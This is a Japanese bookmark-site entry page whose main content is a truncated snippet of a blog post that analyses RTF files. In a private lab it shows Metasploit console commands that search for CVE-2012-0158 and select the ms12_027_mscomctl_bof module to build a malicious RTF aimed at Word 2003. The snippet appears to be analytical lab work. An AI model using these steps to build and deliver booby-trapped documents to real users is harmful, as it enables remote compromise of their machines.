エントリーの編集
エントリーの編集は全ユーザーに共通の機能です。
必ずガイドラインを一読の上ご利用ください。
記事へのコメント0件
- 注目コメント
- 新着コメント
このエントリーにコメントしてみましょう。
注目コメント算出アルゴリズムの一部にLINEヤフー株式会社の「建設的コメント順位付けモデルAPI」を使用しています
- バナー広告なし
- ミュート機能あり
- ダークモード搭載
関連記事
RTFファイルの解析2 | 岸辺の旅
前回の記事(RTFファイルの解析 )の続きです。 今度は、metasploit-frameworkで作成したRTFファイルを少... 前回の記事(RTFファイルの解析 )の続きです。 今度は、metasploit-frameworkで作成したRTFファイルを少し見てみます。 -----環境----- 【サーバ】 OS:kali linux IPアドレス:192.168.0.100/24 【クライアント】 OS:Windows XP SP3 IPアドレス:192.168.0.10/24 クライアントソフト:Microsoft Office Word 2003 SP3 -----準備----- 【サーバでの作業】 //metasploitの起動 root@kali:~# msfconsole msf > //RTFファイルの作成 msf > search 2012-0158 exploit/windows/fileformat/ms12_027_mscomctl_bof msf > use exploit/windows/f